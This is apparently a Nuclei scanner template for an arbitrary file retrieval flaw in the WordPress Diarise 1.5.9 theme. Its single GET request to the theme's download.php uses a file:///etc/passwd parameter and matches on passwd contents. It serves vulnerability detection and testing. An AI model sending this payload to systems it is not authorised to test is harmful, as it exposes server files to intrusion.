id: diarise-theme-lfi

info:
  name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability.
  reference:
    - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
    - https://cxsecurity.com/issue/WLB-2019050123
    - https://woocommerce.com/?aff=1790
  classification:
    cwe-id: CWE-98
  metadata:
    max-request: 1
  tags: packetstorm,wordpress,wp-theme,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100ab305daf887106afc088e77d5b8d4b79c8ccb0c8c6a7340a8d584dc73abe1b80022100e92c114436f81ca7af3c9a71e68e3053fa812fef0d4481d678dd8ee933eefa87:922c64590222798bb761d5b6d8e72950
